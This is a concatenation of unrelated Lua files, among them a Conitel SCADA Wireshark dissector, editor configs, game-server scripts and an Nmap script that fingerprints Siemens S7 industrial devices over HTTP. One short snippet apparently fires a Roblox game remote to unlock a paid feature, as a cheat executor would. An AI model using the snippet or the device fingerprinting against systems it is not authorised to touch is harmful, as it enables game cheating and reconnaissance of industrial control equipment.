-- change to spit this out in blocks of 4, spaces on each byte
local dataleaf = subtree:add(f.data, buffer())
-- local datalenleaf = subtree:add("Data Length : " .. pktlen)
local blockleaf = subtree:add("Payload Data")
local block1b = GetBlockB(buffer(0,4):uint())
if ((conitelfunction == 2) or (conitelfunction == 4)) then
blockleaf:add("1B " .. string.format("0x%03x",block1b) .. " Conitel Channel " .. string.format("0%d",12 - GetSetBitIndex(block1b,12)))
else
blockleaf:add("1B " .. string.format("0x%03x",block1b))
end
for blk = 1, blockcount-1,1
do
local block = buffer(blk*4,4):uint()
blockleaf:add(blk+1 .. "A " .. string.format("0x%03x",GetBlockA(block)))
blockleaf:add(blk+1 .. "B " .. string.format("0x%03x",GetBlockB(block)))
end
if (conitelfunction == 10) then
local block = buffer(0,4):uint()
local soeblockcount = 1
local payloads = {}
payloads[soeblockcount] = GetBlockB(block)
soeblockcount = soeblockcount + 1
for blk = 1, blockcount-1,1
do
block = buffer(blk*4,4):uint()
payloads[soeblockcount] = GetBlockA(block)
soeblockcount = soeblockcount + 1
payloads[soeblockcount] = GetBlockB(block)
soeblockcount = soeblockcount + 1
end
-- So now we have the payloads, need to extract the group, index, timestamp for the SOE records
-- variable length - 41 or 30 bits long. The first record should always be 41 bits
local payloadbitindex = 0
local maxpayloadbitindex = 12 * #payloads
local soegroup = 0
local soeindex = 0
local soebitvalue = 0
local result = false
local soeblk = 1
while true
do
result, payloadbitindex, soegroup, soeindex, soebitvalue = DecodeSOERecord(payloads, payloadbitindex, maxpayloadbitindex )
-- If the preceeding function failed, exit loop
if (result == false) then break end
local blockleaf = subtree:add(f.soedata, soeblk)
blockleaf:add("SOE Group " .. soegroup)
blockleaf:add("SOE Index " .. soeindex)
blockleaf:add("SOE Bitvalue "..soebitvalue)
soeblk = soeblk + 1
end
end
-- If not our protocol, we should return 0. If it is ours, return nothing.
--debug("Packet is good");
pinfo.conversation = conitel_proto
end
-- The payload is an array of 12 bit values, stored in the lower 12 bits.
-- payloadbitindex is the index into this array. So 0 is bit 11 in the first payload array value. 12 is bit 11 in the second payload entry.
-- We return true (succeed) or false. The payloadbitindex will be updated and returned
function DecodeSOERecord(payloads, payloadbitindex, maxpayloadbitindex)
soegroup = 0
soeindex = 0
if (payloadbitindex + 30 > maxpayloadbitindex) then -- make sure there is at least enough data for a short SOE record
return false, payloadbitindex, soegroup, soeindex
end
-- Collect bit values into variables, pass in the payload array, the bit index into that array and the number of bits
soegroup,payloadbitindex = ExtractBits(payloads, payloadbitindex,3)
soeindex,payloadbitindex = ExtractBits(payloads, payloadbitindex,7)
soebitvalue,payloadbitindex = ExtractBits(payloads, payloadbitindex,1)
QualityBit,payloadbitindex = ExtractBits(payloads, payloadbitindex,1)
TimeFormatBit,payloadbitindex = ExtractBits(payloads, payloadbitindex,1)
if (TimeFormatBit == 1) then -- Long time
print("Long Time SOE")
Hour,payloadbitindex = ExtractBits(payloads, payloadbitindex,5)
Minute,payloadbitindex = ExtractBits(payloads, payloadbitindex,6)
end
Second,payloadbitindex = ExtractBits(payloads, payloadbitindex,6)
Millisecond,payloadbitindex = ExtractBits(payloads, payloadbitindex,10)
LastEventFlag,payloadbitindex = ExtractBits(payloads, payloadbitindex,1)
return true, payloadbitindex, soegroup, soeindex, soebitvalue
end
function ExtractBits(payloads, payloadbitindex, numberofbits)
local result = 0;
for bit = numberofbits-1, 0 ,-1
do
result = result + GetBit(payloads, payloadbitindex, bit)
payloadbitindex = payloadbitindex + 1
end
print("Result, numbits "..result..", "..numberofbits)
return result, payloadbitindex
end
function GetSetBitIndex( payload, maxbit )
-- Will return the first set bit, if none set returns -1
for bit = maxbit-1, 0 ,-1
do
local bitvalue = bit32.band(bit32.rshift(payload,bit), 0x01)
if bitvalue == 1 then
return bit -- A bit was set
end
end
return -1
end
function GetBit(payloads, payloadbitindex, bitleftshift)
local block = math.floor(payloadbitindex / 12)
local bit = payloadbitindex % 12
if (block+1 > #payloads) then
return 0
end
local bitvalue = bit32.band(bit32.rshift(payloads[block+1],11-bit), 0x01)
-- Now left shift to put the bit in the correct position for the answer
bitvalue = bit32.lshift(bitvalue, bitleftshift)
return bitvalue
end
function CalculateBCH(block)
local bch = 0
-- xor each of the sub-remainders corresponding to set bits in the first 26 bits of the payload
for bit = 0, 25 ,1
do
if (bit32.band(bit32.lshift(block, bit),0x80000000) == 0x80000000) then -- The bit is set
bch = bit32.band(bit32.bxor(bch,BCH[bit+1]),0x1F) -- LUA Array index is 1 based, not 0. Limit to 5 bits
end
end
return bch
end
function GetFunction(block)
return bit32.band(bit32.rshift(block,28),0x0f)
end
function GetStation(block)
return bit32.band(bit32.rshift(block,24),0x0f)
end
function GetGroup(block)
return bit32.band(bit32.rshift(block,20),0x0f)
end
function GetBlockABit(block)
return bit32.band(bit32.rshift(block,19),0x01)
end
function GetBlockBBit(block)
return bit32.band(bit32.rshift(block,6),0x01)
end
function GetBlockA(block)
return bit32.band(bit32.rshift(block,20),0x0FFF)
end
function GetBlockB(block)
return bit32.band(bit32.rshift(block,7),0x0FFF)
end
function GetBCH(block)
return bit32.band(bit32.rshift(block,1),0x01F)
end
function GetEOM(block)
return bit32.band(block,0x01)
end
--register as a heuristic dissector
conitel_proto:register_heuristic("tcp",conitel_proto.dissector)
-- load the tcp.port table
--local tcp_table = DissectorTable.get("tcp.port")
-- register our protocol to handle tcp port 5001
-- Add the other ports we use...
--tcp_table:add(5001,conitel_proto)
--tcp_table:add(5002,conitel_proto)
--tcp_table:add(5003,conitel_proto)
--tcp_table:add(5004,conitel_proto)
--tcp_table:add(5005,conitel_proto)
--tcp_table:add(5006,conitel_proto)
--tcp_table:add(5007,conitel_proto)
--tcp_table:add(5008,conitel_proto)
--tcp_table:add(5009,conitel_proto)
--tcp_table:add(5010,conitel_proto)
|
--
-- Inventory Class
--------------------------------------------------------------------------------
-- Imports
--------------------------------------------------------------------------------
local Gamestate = requireLibrary("hump.gamestate")
local Class = requireLibrary("hump.class")
--------------------------------------------------------------------------------
-- Class Definition
--------------------------------------------------------------------------------
Inventory = Class{
-- initializes the inventory
init = function(self)
self.items = {}
self._allitems = {}
end,
addItem = function(self, itemName)
if self._allitems[itemName] == nil then
self.defineEmptyItem(self,itemName)
end
if self.items[itemName] == nil then
self.items[itemName] = {}
self.items[itemName].count = 1
else
self.items[itemName].count = self.items[itemName].count + 1
end
self:addedItemCallback(itemName)
return self.items[itemName]
end,
removeItem = function(self, itemName)
if(self.items[itemName]==nil) then return end
if self._allitems[itemName] == nil then
self.defineEmptyItem(self,itemName)
end
if self.items[itemName].count > 1 then
self.items[itemName].count = self.items[itemName].count - 1
else
self.items[itemName] = nil
end
self:removedItemCallback(itemName)
return self.items[itemName]
end,
removeAllItem = function(self, itemName)
if(self.items[itemName]==nil) then return end
if self._allitems[itemName] == nil then
self.defineEmptyItem(self,itemName)
end
self.items[itemName] = nil
self:removedItemCallback(itemName)
return self.items[itemName]
end,
countItem = function(self, itemName)
if self.items[itemName] ~= nil then
return self.items[itemName].count
else
return 0
end
end,
-- returns true if inventory has item
hasItem = function(self, itemName)
return self.countItem(self,itemName) > 0
end,
-- defines an items, dealing with drawing
defineItem = function(self,itemName,drawFn,updateFn)
self._allitems[itemName] = {}
self._allitems[itemName].count = function()
return self.countItem(self,itemName)
end
self._allitems[itemName].remove = function()
return self.removeItem(self,itemName)
end
self._allitems[itemName].draw = function() end
self._allitems[itemName].update = function() end
if drawFn ~= nil then
self._allitems[itemName].draw = drawFn
end
if updateFn ~= nil then
self._allitems[itemName].update = updateFn
end
end,
-- draw all items
draw = function(self)
for k,v in pairs(self._allitems) do
if self.hasItem(self, k) then
self._allitems[k]:draw()
end
end
end,
-- update items for animations
update = function(self,dt)
for k,v in pairs(self._allitems) do
if self.hasItem(self, k) then
self._allitems[k]:update(dt)
end
end
end,
-- define an empty item
defineEmptyItem = function(self, itemName)
self.defineItem(self,
itemName,
function() end,
function() end)
end,
addedItemCallback = function()
-- callback to be overwritten
end,
removedItemCallback = function()
-- callback to be overwritten
end
}
return Inventory
|
-- This is where your custom modules and plugins go.
-- See the wiki for a guide on how to extend NvChad
local hooks = require "core.hooks"
-- NOTE: To use this, make a copy with `cp example_init.lua init.lua`
--------------------------------------------------------------------
-- To modify packaged plugin configs, use the overrides functionality
-- if the override does not exist in the plugin config, make or request a PR,
-- or you can override the whole plugin config with 'chadrc' -> M.plugins.default_plugin_config_replace{}
-- this will run your config instead of the NvChad config for the given plugin
-- hooks.override("lsp", "publish_diagnostics", function(current)
-- current.virtual_text = false;
-- return current;
-- end)
-- To add new mappings, use the "setup_mappings" hook,
-- you can set one or many mappings
-- example below:
-- hooks.add("setup_mappings", function(map)
-- map("n", "<leader>cc", "gg0vG$d", opt) -- example to delete the buffer
-- .... many more mappings ....
-- end)
-- To add new plugins, use the "install_plugin" hook,
-- NOTE: we heavily suggest using Packer's lazy loading (with the 'event' field)
-- see: https://github.com/wbthomason/packer.nvim
-- examples below:
hooks.add("install_plugins", function(use)
local plugin_settings = require("core.utils").load_config().plugins
-- colorscheme
use "marko-cerovac/material.nvim"
-- quick navigation
use {
"phaazon/hop.nvim",
branch = "v1", -- optional but strongly recommended
config = function()
-- you can configure Hop the way you like here; see :h hop-config
require("hop").setup { keys = "etovxqpdygfblzhckisuran" }
end,
}
-- clipboard manager
use {
"AckslD/nvim-neoclip.lua",
requires = { "tami5/sqlite.lua", module = "sqlite" },
config = function()
require("neoclip").setup {
history = 50,
enable_persistant_history = true,
db_path = vim.fn.stdpath "data" .. "/databases/neoclip.sqlite3",
filter = nil,
preview = true,
default_register = "+",
content_spec_column = false,
on_paste = {
set_reg = true,
},
-- keys = {
-- i = {
-- select = "<cr>",
-- paste = "<c-p>",
-- paste_behind = "<c-k>",
-- custom = {},
-- },
-- n = {
-- select = "<cr>",
-- paste = "p",
-- paste_behind = "P",
-- custom = {},
-- },
-- },
}
end,
}
use {
"chentau/marks.nvim",
config = function()
require("marks").setup {
-- whether to map keybinds or not. default true
default_mappings = true,
-- which builtin marks to show. default {}
builtin_marks = { ".", "<", ">", "^" },
-- whether movements cycle back to the beginning/end of buffer. default true
cyclic = true,
-- whether the shada file is updated after modifying uppercase marks. default false
force_write_shada = false,
-- how often (in ms) to redraw signs/recompute mark positions.
-- higher values will have better performance but may cause visual lag,
-- while lower values may cause performance penalties. default 150.
refresh_interval = 250,
-- sign priorities for each type of mark - builtin marks, uppercase marks, lowercase
-- marks, and bookmarks.
-- can be either a table with all/none of the keys, or a single number, in which case
-- the priority applies to all marks.
-- default 10.
sign_priority = { lower = 10, upper = 15, builtin = 8, bookmark = 20 },
-- disables mark tracking for specific filetypes. default {}
excluded_filetypes = { "terminal", "TelescopePrompt" },
-- marks.nvim allows you to configure up to 10 bookmark groups, each with its own
-- sign/virttext. Bookmarks can be used to group together positions and quickly move
-- across multiple buffers. default sign is '!@#$%^&*()' (from 0 to 9), and
-- default virt_text is "".
bookmark_0 = {
sign = "⚑",
virt_text = "hello world",
},
mappings = {},
}
end,
}
-- version control (git, svn)
if vim.fn.has "mac" == 1 then -- work computer
use "mhinz/vim-signify"
end
-- formatters
use "pappasam/vim-filetype-formatter"
-- symbols
use {
"SmiteshP/nvim-gps",
disable = not plugin_settings.status.feline,
requires = "nvim-treesitter/nvim-treesitter",
after = "nvim-treesitter",
event = "BufRead",
config = function()
require("nvim-gps").setup()
end,
}
-- highlight todo
use {
"folke/todo-comments.nvim",
requires = "nvim-lua/plenary.nvim",
config = function()
require("todo-comments").setup {}
end,
}
use {
"TimUntersberger/neogit",
requires = "nvim-lua/plenary.nvim",
config = function()
require("neogit").setup {}
end,
}
-- use "simrat39/symbols-outline.nvim"
end)
-- alternatively, put this in a sub-folder like "lua/custom/plugins/mkdir"
-- then source it with
-- require "custom.plugins.mkdir"
vim.o.colorcolumn = "99"
vim.o.scrolloff = 999
-- hop keymapping
vim.api.nvim_set_keymap("", "f", "<cmd>lua require'hop'.hint_char1({})<cr>", {})
-- formatters
vim.g.vim_filetype_formatter_commands = {
python = "black -q - | isort -q - | docformatter -",
lua = "stylua -",
}
-- format on save
vim.api.nvim_exec(
[[
augroup FormatAutogroup
autocmd!
autocmd BufWritePost *.jsx,*.tsx,*.js,*.ts,*.rs,*.lua,*.py FiletypeFormat
augroup END
]],
true
)
-- split keymapping
vim.api.nvim_set_keymap("n", "<space>\\", "<cmd>vsplit<CR>", {})
vim.api.nvim_set_keymap("n", "<space>|", "<cmd>split<CR>", {})
-- open neogit
vim.api.nvim_set_keymap("n", "<space>git", "<cmd>Neogit<CR>", {})
-- outline settings
vim.g.symbols_outline = {
relative_width = false,
width = 40,
}
vim.api.nvim_set_keymap("n", "<space>n", "<cmd>SymbolsOutline<CR>", {})
|
getglobal game
getfield -1 ReplicatedStorage
getfield -1 GPEnable
getfield -1 FireServer
pushvalue -2
pushstring STANDNAME
pcall 2 1 0
|
newFile()
local args = readStdin()
print( encodeJSON( Meshes.import( args ) ) )
|
--[[
Module: Class
Contains methods to convert a module into a proper class.
A proper class contains the following properties:
- (function?) .constructor: A method used after the creation of the object to finalize its creation.
Example:
function SomeClass.constructor (newObject)
assert(type(newObject.x) == "number", "x must be a number!")
end
- (table?) .metatable: A table containing metamethods. If null will not be set.
- (table) .prototype: A table which contains default constructor values of the class.
- (string) .prototype.type: The string representation of the class name.
]]
-- Constants
local _C = require("Helpers.Common")
local C = {
-- Errors for VerifyClass
ERR_ARG_MODULE = "The module provided must be a table. Type provided: %s",
ERRNO_ARG_MODULE = 1,
ERR_ARG_CONSTRUCTOR = "The constructor provided must be a function or nil. Type provided: %s",
ERRNO_ARG_CONSTRUCTOR = 2,
ERR_ARG_PROTOTYPE = "The prototype provided must be a table. Type provided: %s",
ERRNO_ARG_PROTOTYPE = 3,
ERR_ARG_TYPE = "The prototype must contain a type string. Type provided: %s",
ERRNO_ARG_TYPE = 4,
ERR_ARG_METATABLE = "The metatable provided must be a table or nil. Type provided: %s",
ERRNO_ARG_METATABLE = 5,
-- Errors for CreateClass
ERR_INVALID_CLASSBASE = "The module provided is not a valid ClassBase: %s",
-- Errors for Is
ERR_INFINITE_TYPE_LOOP = "The base class is the same as the object's class, causing an infinite loop when comparing."
}
-- Imports
-- This
local Class = {}
--[[
Method: VerifyType
Verifies a module is a proper class.
Arguments:
(table) module
Returns: (string|bool) result, (number?) errno
result will be true if it is a proper class, otherwise it returns the specific reason it isn't.
]]
function Class.VerifyType (module)
-- module must be a table.
local type_module = type(module)
if (type_module ~= "table") then
return C.ERR_ARG_MODULE:format(type_module), C.ERRNO_ARG_MODULE
end
-- constructor must be a table or nil.
local type_constructor = type(module.constructor)
if (type_constructor ~= "function" and type_constructor ~= "nil") then
return C.ERR_ARG_CONSTRUCTOR:format(type_constructor), C.ERRNO_ARG_CONSTRUCTOR
end
-- prototype must be a table.
local type_prototype = type(module.prototype)
if (type_prototype ~= "table") then
return C.ERR_ARG_PROTOTYPE:format(type_prototype), C.ERRNO_ARG_CONSTRUCTOR
end
-- prototype.type must be a string.
local type_type = type(module.prototype.type)
if (type_type ~= "string") then
return C.ERR_ARG_TYPE:format(type_type), C.ERRNO_ARG_TYPE
end
-- metatable must be a table or nil.
local type_metatable = type(module.metatable)
if (type_metatable ~= "table" and type_metatable ~= "nil") then
return C.ERR_ARG_METATABLE:format(type_metatable), C.ERRNO_ARG_METATABLE
end
-- Is a valid class.
return true, nil
end
--[[
Method: CreateClass
Converts a module to a class using its properties.
This adds a .new method to the module, which does the following:
1. Creates a new object (table) which:
2. Inherits the default values from the prototype of the module, then
3. Inherits any accessible methods on the base level of the module (such as module.DoSomething), then
4. Runs the constructor method if it exists on the new object, then
5. Assigns the metatable, if it exists, to the new object, then
6. Finally, returns the new object
Arguments:
(ClassBase) module
Returns: (void)
Throws:
(ERR_INVALID_CLASSBASE) The module provided is not a proper ClassBase.
]]
function Class.CreateClass (module)
-- Make sure module can be turned into a class.
local isValidClass = Class.VerifyType(module)
if (isValidClass ~= true) then
error(C.ERR_INVALID_CLASSBASE:format(isValidClass))
end
function module.new (...)
-- 1. Create a new object
local newObject = {}
-- 2. Inherit the default values from the prototype
for key, value in pairs(module.prototype) do
newObject[key] = value
end
-- 3. Inherit accessible methods from the module
for key, value in pairs(module) do
if (type(value) == "function" and key ~= "new") then
newObject[key] = value
end
end
-- 4. Runs the constructor method if it exists on the new object
if (type(module.constructor) == "function") then
module.constructor(newObject, ...)
end
-- 5. Assign the metatable, if it exists, to the new object
if (type(module.metatable) == "table") then
setmetatable(newObject, module.metatable)
end
-- 6. Finally, return the new object
return newObject
end
end
--[[
Method: Inherit
Inherits class properties from base into destination
Arguments:
(ClassBase) base
(ClassBase) destination
]]
function Class.Inherit (base, destination)
-- Create the prototype table if it doesn't exist.
if (destination.prototype == nil) then
destination.prototype = {}
end
-- Clone the prototype from the base into the destination.
for key, value in pairs(base.prototype) do
if (key ~= "type") then
destination.prototype[key] = value
end
end
-- Inherit the metatable of the base if it exists.
if (base.metatable ~= nil) then
if (destination.metatable == nil) then
destination.metatable = {}
end
for key, value in pairs(base.metatable) do
destination.metatable[key] = value
end
end
for key, value in pairs(base) do
if type(value) == "function" then
destination[key] = value
end
end
end
--[[
Method: Is
Checks if a object is a type.
Arguments:
(any) object
(string) _type
Returns: (bool) result
Throws:
(ERR_INFINITE_TYPE_LOOP) If the base class of an object is the same as the object, we can't proceed. This should not happen.
]]
function Class.Is (object, _type)
-- Primitive type comparison
if (type(object) == _type) then
return true
end
if (type(object) ~= "table") then
return false
end
local comparison_object = object -- So we can go deeper if there are layers of inheritance.
while (comparison_object ~= nil) do
if (comparison_object.type == _type) then
return true
end
if (object.base == object) then
error(C.ERR_INFINITE_TYPE_LOOP) -- We do not want infinite loops.
end
comparison_object = object.base
end
return false
end
return Class
|
--[[
Helpers for various other parts of libmthelpers for randomness.
]]
-- ffs, seeding, why...
math.randomseed(os.time())
-- generate base64 random strings (doesn't handle padding).
local base64_chars =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" ..
"abcdefghijklmnopqrstuvwxyz" ..
"0123456789+/"
local i = {}
-- impure partial application, I know...
local get_random_base64_ = function(n)
assert(type(n) == "number")
assert(n > 0)
assert(n % 1.0 == 0)
return function()
local s = ""
for i = 1, n, 1 do
local v = math.random(64)
local char = base64_chars:sub(v, v)
s = s .. char
end
return s
end
end
i.base64_ = get_random_base64_
return i
|
return {
small_building = {
areaofeffect = 240,
craterboost = 0,
cratermult = 0,
explosiongenerator = "custom:FLASHSMALLBUILDING",
impulseboost = 0.123,
impulsefactor = 0.123,
name = "Smallbuilding",
range = 480,
reloadtime = 3.6,
soundhit = "xplosml3",
soundstart = "largegun",
turret = 1,
weaponvelocity = 250,
damage = {
default = 900,
},
},
}
|
--[[
module: IContext
author: DylanYang
time: 2021-02-23 14:23:03
idea:
advance:
]]
local _M = Class("IContext")
_M.abstract = true
local public = _M.public
function public:SetClock(hour) -- 设置时间
end
function public:ChangeState(state) -- 改变状态
end
function public:CallSecurityCenter(msg) -- 联系警报中心
end
function public:RecordLog(msg) -- 在警报中心留下记录
end
return _M
|
RegisterCommand("corner", function(source, args)
TriggerClientEvent('drugs:corner', source)
end)
|
local opt = vim.opt
local function get_item()
local km = opt.iminsert
if km:get() == 1 then
return "RU"
end
return "EN"
end
return {
get_item = get_item,
}
|
function UIListView()
local self = {}
local private = {
type = "UIListView",
id = UIFramework.getNewID(),
title = nil,
content = nil,
icon = nil,
timeout = nil,
template = [[
<div id="<%- id %>" class="ui-framework-parent listview " style="padding: 5px;">
<div children-container-for-id="<%- id %>" class="drag drop" style="height: 50px">
</div>
<div style="clear: both;"></div>
</div>
]]
}
local children = {}
function self.appendChild(child)
table.insert(children, child)
UIFramework.execute("appendChild('" .. private.id .. "', "..child.getObjectAsJSON()..");")
end
function self.setTitle(title)
private.title = title
end
function self.getTitle()
return private.title
end
function self.setContent(content)
private.content = content
end
function self.getContent()
return private.content
end
function self.getObjectAsJSON()
return json_encode(private)
end
return self
end
|
local format = string.format
core.register_craftitem(core.get_current_modname() .. ":unknown_node", {
description = "Unknown Node Spawner",
inventory_image = core.inventorycube("unknown_node.png"),
node_placement_prediction = "unknown",
on_place = function(itemstack, placer, pointed_thing)
itemstack:peek_item()
local pos, under = pointed_thing.above, pointed_thing.under
if core.get_node_or_nil(under).buildable_to then
pos = under
end
local playername = placer:get_player_name()
if core.is_protected(pos, playername) then
core.log("action", format("%s tried to placean unknown node at protected position %s", playername, core.pos_to_string(pos)))
core.record_protection_violation(pos, playername)
return itemstack
end
core.log("action", format("%s places unknown node at %s", playername, core.pos_to_string(pos)))
cubictest.provider.map_content(pos, cubictest.constants.CONTENT_UNKNOWN)
return itemstack
end,
})
|
local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local strbuf = require "strbuf"
description = [[
Checks for SCADA Siemens <code>S7 Communications Processor </code> devices.
The higher the verbosity or debug level, the more disallowed entries are shown.
]]
---
--@output
-- 80/tcp open http syn-ack
-- |_Siemens-CommunicationsProcessor: CP 343-1 CX10
author = "Jose Ramon Palanco, drainware"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"default", "discovery", "safe"}
portrule = shortport.http
local last_len = 0
local function verify_version(body, output)
local version = nil
if string.find (body, "/S7Web.css") then
version = body:match("<td class=\"Title_Area_Name\">(.-)</td>")
if version == nil then
version = "Unknown version"
end
output = output .. version
return true
elseif string.find (body, "examples/visual_key.htm") then
version = body:match("<title>(.-)</title>")
if version == nil then
version = "Unknown version"
end
output = output .. version
return true
elseif string.find (body, "__FSys_Root") then
version = body:match("</B></TD><TD>(.-)</TD></TR>")
version = version:gsub(" ", " ")
if version == nil then
version = "Unknown version"
end
output = output .. version
return true
else
return nil
end
end
action = function(host, port)
local verified, noun
local answer1 = http.get(host, port, "/Portal0000.htm" )
local answer2 = http.get(host, port, "/__Additional" )
local answer3 = http.get(host, port, "/" )
if answer1.status ~= 200 and answer2.status ~= 200 and answer3.status ~= 200 then
return nil
end
if answer1.status == 200 then
answer = answer1
elseif answer2.status == 200 then
answer = answer2
elseif answer3.status == 200 then
answer = answer3
end
local v_level = nmap.verbosity() + (nmap.debugging()*2)
local detail = 15
local output = strbuf.new()
verified = verify_version(answer.body, output)
if verified == nil then
return
end
-- verbose/debug mode, print 50 entries
if v_level > 1 and v_level < 5 then
detail = 40
-- double debug mode, print everything
elseif v_level >= 5 then
detail = verified
end
return output
end
|
local ObjectManager = require("managers.object.object_manager")
EchoTurretsScreenPlay = ScreenPlay:new {
numberOfActs = 1,
screenplayName = "EchoTurretsScreenPlay",
ebTurrets = {
{ "object/installation/turret/turret_dish_large.iff", -5067.6, 100.4, 5676.0 },
{ "object/installation/turret/turret_dish_large.iff", -5107.3, 106.7, 5757.0 },
{ "object/installation/turret/turret_dish_large.iff", -5170.4, 100.4, 5818.3 },
{ "object/installation/turret/turret_dish_large.iff", -4951.3, 81.6, 5392.0 },
}
}
registerScreenPlay("EchoTurretsScreenPlay", true)
function EchoTurretsScreenPlay:start()
if (isZoneEnabled("hoth")) then
self:spawnMobiles()
self:spawnSceneObjects()
end
end
function EchoTurretsScreenPlay:spawnSceneObjects()
for i = 1, #self.ebTurrets, 1 do
local turretID = readData("ebTurrets:" .. i)
local pTurret = getSceneObject(turretID)
if (pTurret == nil) then
local ebTurretData = self.ebTurrets[i]
pTurret = spawnSceneObject("hoth", ebTurretData[1], ebTurretData[2], ebTurretData[3], ebTurretData[4], 0, 0.707107, 0, 0.707107, 0)
if pTurret ~= nil then
local turret = TangibleObject(pTurret)
turret:setFaction(FACTIONREBEL)
turret:setPvpStatusBitmask(1)
end
createObserver(OBJECTDESTRUCTION, "EchoTurretsScreenPlay", "notifyTurretDestroyed", pTurret)
if (pTurret ~= nil) then
writeData("ebTurrets:" .. i, SceneObject(pTurret):getObjectID())
end
end
end
return 0
end
function EchoTurretsScreenPlay:notifyTurretDestroyed(pTurret, pPlayer)
SceneObject(pTurret):destroyObjectFromWorld()
createEvent(360000, "EchoTurretsScreenPlay", "respawnTurret", pTurret, "")
CreatureObject(pPlayer):clearCombatState(1)
return 0
end
function EchoTurretsScreenPlay:respawnTurret(pTurret)
if pTurret == nil then
return
end
TangibleObject(pTurret):setConditionDamage(0, false)
local pZone = getZoneByName("hoth")
if pZone == nil then
return
end
SceneObject(pZone):transferObject(pTurret, -1, true)
end
function EchoTurretsScreenPlay:spawnMobiles()
end
|
object_tangible_wearables_base_base_cybernetic_hand_l = object_tangible_wearables_base_shared_base_cybernetic_hand_l:new {
}
ObjectTemplates:addTemplate(object_tangible_wearables_base_base_cybernetic_hand_l, "object/tangible/wearables/base/base_cybernetic_hand_l.iff")
|
--[[
Write a summation function, in C, that computes the sum of its variable number of numeric arguments:
print(summation()) --> 0
print(summation(2.3, 5.4)) --> 7.7
print(summation(2.3, 5.4, -34)) --> -26.3
print(summation(2.3, 5.4, {})) --> stdin:1: bad argument #3 to 'summation' (number expected, got table)
]]
summation = (require 'summation').summation
print(summation()) --> 0
print(summation(2.3, 5.4)) --> 7.7
print(summation(2.3, 5.4, -34)) --> -26.3
print(summation(2.3, 5.4, {})) --> lua: e27_1.lua:15: bad argument #3 to 'summation' (number expected, got table)...
|
spam = {}
addEvent("finishCase", true)
addEventHandler("finishCase", root,
function ()
if isTimer(spam[source]) then return false end
spam[source] = setTimer(function() end,5000,1)
local rank = getElementData(source,"Rank")
if rank == "Commander" then
money = 10000
elseif rank == "Captain" then
money = 8000
elseif rank == "Lieutenant" then
money = 6000
elseif rank == "Sergeant" then
money = 4000
else
money = 2000
end
exports.NGCdxmsg:createNewDxMessage(source, "[Criminal invistigation] : You earned $"..(money) .." because you have solved the case", 0, 100, 200)
exports.AURpayments:addMoney(source,money,"Custom","Misc",0,"AURdivisions")
end)
|
require "srnn"
function test(bsize, isize, osize, nlayer, nstep, rs, tsfm)
local id={}
local gd={}
for _ = 1, nstep do
table.insert(id, torch.randn(bsize, isize))
table.insert(gd, torch.randn(bsize, osize))
end
local tmod_core=srnn.StepRNN(isize, osize, nlayer)
local tmod=srnn.Sequencer(tmod_core, osize, nil, rs, tsfm)
tmod:evaluate()
for i = 1, 3 do
tmod:forward(id)
end
tmod:training()
tmod:forward(id)
tmod:backward(id, gd)
tmod:forward(id)
tmod:updateGradInput(id, gd)
tmod:accGradParameters(id, gd)
id=torch.randn(nstep, bsize, isize)
gd=torch.randn(nstep, bsize, osize)
tmod_core=srnn.StepRNN(isize, osize, nlayer)
tmod=srnn.Sequencer(tmod_core, osize, nil, rs, tsfm)
tmod:evaluate()
for i = 1, 3 do
tmod:forward(id)
end
tmod:training()
tmod:forward(id)
tmod:backward(id, gd)
tmod:forward(id)
tmod:updateGradInput(id, gd)
tmod:accGradParameters(id, gd)
end
test(30, 29, 59, 1, 1)
test(59, 26, 29, 3, 7)
test(30, 29, 59, 1, 1, true, true)
test(59, 26, 29, 3, 7, true, true)
|
help([[GNU `gettext' is an important step for the GNU Translation Project, as it is an asset on which we may
build many other steps. This package offers to programmers, translators, and even users, a well integrated set of tools
and documentation - Homepage: http://www.gnu.org/software/gettext/]])
whatis([[Description: GNU `gettext' is an important step for the GNU Translation Project, as it is an asset on which we may
build many other steps. This package offers to programmers, translators, and even users, a well integrated set of tools
and documentation - Homepage: http://www.gnu.org/software/gettext/]])
local root = "/opt/apps/software/gettext/0.19.8"
conflict("gettext")
if not isloaded("ncurses/6.0") then
load("ncurses/6.0")
end
prepend_path("ACLOCAL_PATH", pathJoin(root, "share/aclocal"))
prepend_path("CPATH", pathJoin(root, "include"))
prepend_path("LD_LIBRARY_PATH", pathJoin(root, "lib"))
prepend_path("LIBRARY_PATH", pathJoin(root, "lib"))
prepend_path("MANPATH", pathJoin(root, "share/man"))
prepend_path("PATH", pathJoin(root, "bin"))
setenv("EBROOTGETTEXT", root)
setenv("EBVERSIONGETTEXT", "0.19.8")
setenv("EBDEVELGETTEXT", pathJoin(root, "easybuild/gettext-0.19.8-easybuild-devel"))
-- Built with EasyBuild version 3.1.0
|
Time=class({
static={
_lastTime=0,
_time=0,
time={
get=function(self)
return self._time
end
},
deltaTime={
get=function(self)
return self._time-self._lastTime
end
},
Update=function(self,time)
self._lastTime=self._time
self._time=time
end
}
})
|
-- Credits: KIT
-- Date 14/01/2021
if not TeamOrdering then
TeamOrdering = class({})
TeamOrdering.winrates = {}
TeamOrdering.start_time = 5.0
TeamOrdering.Radiant = {}
TeamOrdering.Dire = {}
TeamOrdering.minimum_level_to_reorder = 25
TeamOrdering.fixed_winrate_for_rookies = 15
TeamOrdering.fixed_winrates_for_uncalibrated = 15
end
-- events
-- This function is ONLY for testing purposes
ListenToGameEvent('game_rules_state_change', function()
if GameRules:State_Get() == DOTA_GAMERULES_STATE_CUSTOM_GAME_SETUP then
-- ultimate fail-safe in case something goes wrong
GameRules:SetCustomGameSetupRemainingTime(20.0)
elseif GameRules:State_Get() == DOTA_GAMERULES_STATE_HERO_SELECTION then
-- Call it here to re-apply players to rightful teams in case a smart boi use shuffle command as lobby leader
-- causing weird player disconnects and unable to reconnect (sending players in another team but not fully due to being done in hero selection phase?)
-- TeamOrdering:SetTeams_PostCompute()
end
end, nil)
-- This function is ONLY for public games (triggers when backend successfully gathered every players winrates)
function TeamOrdering:OnPlayersLoaded()
-- if IsInToolsMode() then return end
if PlayerResource:GetPlayerCount() > 3 then
-- re-order teams based on winrate with a delay to make sure winrate values are gathered
GameRules:GetGameModeEntity():SetContextThink(DoUniqueString("anti_stacks_fucker"), function()
self:ComputeTeamSelection()
-- fail-safe
GameRules:GetGameModeEntity():SetContextThink(DoUniqueString("anti_anti_stacks_fucker"), function()
GameRules:SetCustomGameSetupRemainingTime(self.start_time)
return nil
end, self.start_time * 2)
